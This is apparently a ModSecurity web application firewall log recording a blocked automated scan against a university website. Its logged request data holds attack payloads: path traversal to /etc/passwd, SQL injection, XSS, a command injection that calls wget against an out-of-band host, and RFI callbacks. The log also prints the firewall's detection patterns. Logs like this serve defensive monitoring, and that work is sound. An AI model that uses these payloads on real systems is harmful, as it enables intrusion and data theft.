[Tue Aug 29 11:43:55.688829 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAe8l6kAAAAF"]
[Tue Aug 29 11:43:56.370919 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAfSWYMAAAAB"]
[Tue Aug 29 11:43:57.372261 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAdOeXkAAAAS"]
[Tue Aug 29 11:43:58.383038 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAcsLPAAAAAE"]
[Tue Aug 29 11:43:59.368136 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAe8l7UAAAAF"]
[Tue Aug 29 11:44:03.502633 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAcsLQQAAAAE"]
[Tue Aug 29 11:44:03.704992 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAfSWZAAAAAB"]
[Tue Aug 29 11:44:07.538819 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAARphCkAAAAU"]
[Tue Aug 29 11:44:08.372634 2023] [:error] [pid 2015] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAffor0AAAAd"]
[Tue Aug 29 11:44:08.471156 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAdeQ9wAAAAQ"]
[Tue Aug 29 11:44:10.680721 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAfWN08AAAAL"]
[Tue Aug 29 11:44:13.435929 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAcvBr0AAAAJ"]
[Tue Aug 29 11:44:14.448496 2023] [:error] [pid 2041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAf53SsAAAAR"]
[Tue Aug 29 11:44:16.402752 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gy9k9npfwrzde4.oast.site found within TX:1: cjmnbitjmimt14dgn26gy9k9npfwrzde4.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAeChi0AAAAw"]
[Tue Aug 29 11:44:18.423549 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAdeQ-sAAAAQ"]
[Tue Aug 29 11:44:20.394573 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26grh5byc3peyxjr.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAdftg4AAAAG"]
[Tue Aug 29 11:44:23.480356 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAdQ3q4AAAAV"]
[Tue Aug 29 11:44:26.381686 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAfVkaUAAAAD"]
[Tue Aug 29 11:44:27.365389 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfg7yMAAAAe"]
[Tue Aug 29 11:44:29.504001 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAenGhEAAAAM"]
[Tue Aug 29 11:44:32.469649 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAdOecgAAAAS"]
[Tue Aug 29 11:44:35.395588 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g9hm83qyke9tgq.oast.site found within TX:1: cjmnbitjmimt14dgn26g9hm83qyke9tgq.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAfg7zsAAAAe"]
[Tue Aug 29 11:44:35.413364 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAhBR@4AAAAX"]
[Tue Aug 29 11:44:43.464086 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAfVkdYAAAAD"]
[Tue Aug 29 11:44:44.425757 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAg-pJUAAAAR"]
[Tue Aug 29 11:44:47.365446 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAdOee0AAAAS"]
[Tue Aug 29 11:44:47.677092 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAfZj8UAAAAN"]
[Tue Aug 29 11:44:48.421132 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAfcoUkAAAAa"]
[Tue Aug 29 11:44:48.458389 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAhMtT0AAAAM"]
[Tue Aug 29 11:44:49.372891 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAc4E00AAAAP"]
[Tue Aug 29 11:44:50.493296 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAfZj9AAAAAN"]
